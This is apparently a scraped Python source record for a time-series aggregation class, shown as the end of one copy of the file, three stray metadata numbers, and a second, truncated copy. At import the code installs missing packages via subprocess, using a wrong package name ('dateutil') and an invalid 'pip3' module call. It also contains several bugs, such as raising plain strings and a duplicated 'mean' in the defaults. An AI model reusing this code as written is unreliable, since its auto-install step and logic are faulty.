2: spring 3: summer 4: autumn ''' season_dict = { 1: 'Winter', 2: 'Spring', 3: 'Summer', 4: 'Autumn', } if parameter.lower()=='season': time_para_list = [Time._get_season(val.month) for val in time] else: time_para_list = [eval(f"val.{parameter}") for val in time] time_para_list = np.array(time_para_list) if time_para_list.size==0: return np.array(np.nan),np.array(np.nan),np.array(np.nan) minTime = np.nanmin(time_para_list) maxTime = np.nanmax(time_para_list) # if ratio==None: ratio=0 # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] for i in range(minTime,maxTime+1): mask = np.where(time_para_list==i)[0] tummy.append(i if parameter.lower()!='season' else [time[mask[0]].year,season_dict[i]]) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): 
dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _get_season(month): ''' enum: 1: winter 2: spring 3: summer 4: autumn ''' return (month%12+3)//3 @staticmethod def set_config(self,init:bool=False,**kwargs) -> None: ''' config['storageForward']: save the value at the start time or not<br> config['outputPara_list]: select output parameter [mean,std,max,min] Arguments: init: Is the initialize status? Default is False If set True, will using the init state. **kwargs: Optional, this work only init set false. config: { asDict: bool, storage: bool, fixTime: bool, zeroStart: bool, selfUpdate: bool, outputPara_list: list = [ mean, std, max, min, maxTime, minTime, quartile, median ] } ''' if init==True: self.config = dict( asDict=False, storageForward=True, fixTime=True, zeroStart=True, selfUpdate=True, outputPara_list=['mean','std','mean'] # ['mean','std','max','min','maxTime','minTime','quartile','median'], ) else: for key in kwargs.keys(): self.config[key] = kwargs[key] def input(self,time: Union[list, np.ndarray],data: Union[list, np.ndarray],dtype:object =float, ratio: Union[int, float]=None,header: list=None,starttime:datetime.datetime=None,endtime:datetime.datetime=None) -> str: ''' time <datetime> : input timelist of data <br> data <numerical>: input data array Arguments: time: list of time series data: list of data set depend on time series dtype: convert type of data elements ratio: require of the data numbers(int) or ratio(float) header: export tag of data header starttime: start of the time endtime: end of the time Returns: return 'Successfully' when process success. ''' self.time = np.array(time) self.data = np.array(data,dtype=dtype) self.ratio = ratio self.header = header self.starttime = starttime self.endtime = endtime self.counts = [] return "Successfully" def isrepeat(self) -> bool: ''' Check weather data repeat depend on time. Returns: check there has repeat datetime in the data set. ''' if len(self.time.reshape(-1))==len(set(self.time)): return False else: return True def second(self,ratio: Union[int, float]=None,base: int=1000) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. 
{ time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), zeroPara=dict(microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='second',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def minute(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), zeroPara=dict(second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='minute',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def hour(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. 
Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1) ,zeroPara=dict(minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='hour',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def day(self,ratio: Union[int, float]=None,base: int=24) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. 
{ time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), zeroPara=dict(hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='day',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def month(self,ratio: Union[int, float]=None,base: int=30) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='month',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def season(self,ratio: Union[int, float]=None,base: int=3) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. 
Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' ''' Spring: March, April, May <br> Summer: June, July, August <br> Autumn: September, October, November <br> Winter: December, January, February ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='season',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def year(self,ratio:Union[int, float]=None,base:int=12) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. 
{ time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), zeroPara=dict(month=1,day=1,hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='year',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def get(self,parameter: str=None) -> Union[list, dict, np.ndarray]: ''' export the data from Time factory. Arguments: parameter: select the return parameter. enum: None: { time, data, counts }, config, time, data, counts Returns: select parameter data set. ''' if parameter=='config': return self.config if (parameter==None) and (self.config['asDict']): return dict(time=self.time, data=Time._set_header(self.data,header=self.header), counts=self.counts) if parameter=='time': return self.time if parameter=='data': return Time._set_header(self.data,header=self.header) if parameter=='counts': return self.counts print("Please select the return parameter or set config['asDict']=True.") if __name__ == "__main__": # Implement the object myobj = Time() # Input data import datetime, random st = datetime.datetime(2020,1,1) number = 50000 time = [st+datetime.timedelta(hours=val) for val in range(number)] data = [[random.gauss(10,5) for _ in range(4)] for _ in range(number)] myobj.input(time,data,header=['a','b','c','d']) # Calculate and Get result # myobj.hour(1,500) myobj.set_config(outputPara_list=['mean','std','max','quartile']) myobj.season() myobj.set_config(asDict=True) result = myobj.get() print(result)
43.578808
159
0.554951
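The __main__ block of the timeseries record above only exercises the season() aggregation. As a second, hypothetical usage sketch of the same Time class, the following reduces synthetic 10-minute samples of one variable to hourly mean and standard deviation and reads the result back through get(); the variable names and random data are assumptions for illustration only.

import datetime, random

start = datetime.datetime(2021, 1, 1)
time = [start + datetime.timedelta(minutes=10 * i) for i in range(1000)]
data = [[random.gauss(20.0, 2.0)] for _ in range(1000)]    # one column of synthetic values

obj = Time()
obj.input(time, data, header=['temperature'])
obj.set_config(asDict=True, outputPara_list=['mean', 'std'])
obj.hour()                      # aggregate into fixed, zero-started hourly bins
result = obj.get()              # dict with 'time', 'data' ({'mean': ..., 'std': ...}) and 'counts'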
#!/bin/python3 # if used ubuntu 20.10 or later, interpreter set as #!/bin/python and use pip instead of pip3 # =================================================================== # # platfrom check # dateutil check and import try: from dateutil.relativedelta import relativedelta except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "dateutil"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "dateutil"]) else: raise "Unknow platform, please install 'dateutil' by yourself." from dateutil.relativedelta import relativedelta # =================================================================== # # platfrom check # numpy check and import try: import numpy as np except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "numpy"]) else: raise "Unknow platform, please install 'numpy' by yourself." import numpy as np # =================================================================== # import datetime from typing import Union class Time(object): ''' storageForward: True -> storage value in starttime <br> storageForward: False -> storage value in endtime ''' def __init__(self): self.set_config(init=True) def _check_data(self): if not "self.time" in locals(): raise "Please check input time." if not "self.data" in locals(): raise "Please check input data." return True @staticmethod def _set_ndarray(data): if isinstance(data,dict): for key in data.keys(): data[key]=np.array(data[key]) else: data=np.array(data) return data @staticmethod def _set_header(data,header=None): ''' only used to format output data ''' # ----------------------------------------------------------- # # here i'm not sure what data type i need to use. 
# thus, if data=np.array(obj(dict)), then we need # to use data.item() to get the data try: data=data.item() except: pass # ----------------------------------------------------------- # if header!=None: dummy={} for i,head in enumerate(header): if isinstance(data,dict): for key in data.keys(): if i==0: dummy[key]={} dummy[key][head]=data[key][:,i] else: dummy[head]=data[:,i] return dummy return data @staticmethod def _fixTime(time,data,timeStep:dict,zeroPara:dict,storageForward:bool,outputPara_list:list, starttime:datetime.datetime=None,endtime:datetime.datetime=None): # def _fixTime(time,data,timeStep:dict,ratio:int,zeroPara:dict,storageForward:bool,starttime:datetime.datetime=None,endtime:datetime.datetime=None): ''' zeroPara: set start datetime para season enum: 1: spring 2: summer 3: autumn 4: winter ''' minTime = np.nanmin(time) if starttime==None else starttime maxTime = np.nanmax(time) if endtime==None else endtime # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] if 'season' in timeStep.keys(): dt = relativedelta(months=3) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) dummy={} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] # deal with perfix date before a new start i = Time._get_season(minTime.month) year = minTime.year if minTime.month!=12 else minTime.year+1 mask=np.where(time<datetime.datetime(year,3*i,1))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime=datetime.datetime(year,3*i,1) while minTime<=maxTime: if minTime>max(time): break mask=np.where((time>=minTime) & (time<minTime+dt))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime+=dt else: dt = relativedelta(**timeStep) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) # if ratio==None: ratio=0 dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] while minTime<=maxTime: mask = np.where((time>=minTime) & (time<minTime+dt))[0] if mask.size==0: minTime+=dt; continue tummy.append(minTime) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else 
np.array([np.nan]*len(data[0]))) minTime+=dt dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _nofixTime(time,data,parameter:str,outputPara_list:list): # def _nofixTime(time,data,parameter:str,ratio:int): ''' parameter: set the datetime parameter (second, minute ...etc) will be used to calculate season enum: 1: winter 2: spring 3: summer 4: autumn ''' season_dict = { 1: 'Winter', 2: 'Spring', 3: 'Summer', 4: 'Autumn', } if parameter.lower()=='season': time_para_list = [Time._get_season(val.month) for val in time] else: time_para_list = [eval(f"val.{parameter}") for val in time] time_para_list = np.array(time_para_list) if time_para_list.size==0: return np.array(np.nan),np.array(np.nan),np.array(np.nan) minTime = np.nanmin(time_para_list) maxTime = np.nanmax(time_para_list) # if ratio==None: ratio=0 # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] for i in range(minTime,maxTime+1): mask = np.where(time_para_list==i)[0] tummy.append(i if parameter.lower()!='season' else [time[mask[0]].year,season_dict[i]]) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _get_season(month): ''' enum: 1: winter 2: spring 3: summer 4: autumn ''' return (month%12+3)//3 @staticmethod def _QC_numbers(data,count,threshold): if threshold==None: return data count = np.array(count) data = np.array(data) mask = np.where(count<threshold)[0] data[mask,:]=np.nan return data def set_config(self,init:bool=False,**kwargs) -> None: ''' config['storageForward']: save the value at the start time or not<br> config['outputPara_list]: select output parameter [mean,std,max,min] Arguments: init: Is the initialize status? Default is False If set True, will using the init state. **kwargs: Optional, this work only init set false. 
config: { asDict: bool, storage: bool, fixTime: bool, zeroStart: bool, selfUpdate: bool, outputPara_list: list = [ mean, std, max, min, maxTime, minTime, quartile, median ] } ''' if init==True: self.config = dict( asDict=False, storageForward=True, fixTime=True, zeroStart=True, selfUpdate=True, outputPara_list=['mean','std','mean'] # ['mean','std','max','min','maxTime','minTime','quartile','median'], ) else: for key in kwargs.keys(): self.config[key] = kwargs[key] def input(self,time: Union[list, np.ndarray],data: Union[list, np.ndarray],dtype:object =float, ratio: Union[int, float]=None,header: list=None,starttime:datetime.datetime=None,endtime:datetime.datetime=None) -> str: ''' time <datetime> : input timelist of data <br> data <numerical>: input data array Arguments: time: list of time series data: list of data set depend on time series dtype: convert type of data elements ratio: require of the data numbers(int) or ratio(float) header: export tag of data header starttime: start of the time endtime: end of the time Returns: return 'Successfully' when process success. ''' self.time = np.array(time) self.data = np.array(data,dtype=dtype) self.ratio = ratio self.header = header self.starttime = starttime self.endtime = endtime self.counts = [] return "Successfully" def isrepeat(self) -> bool: ''' Check weather data repeat depend on time. Returns: check there has repeat datetime in the data set. ''' if len(self.time.reshape(-1))==len(set(self.time)): return False else: return True def second(self,ratio: Union[int, float]=None,base: int=1000) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), zeroPara=dict(microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='second',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def minute(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. 
Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), zeroPara=dict(second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='minute',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def hour(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. 
{ time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1) ,zeroPara=dict(minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='hour',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def day(self,ratio: Union[int, float]=None,base: int=24) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), 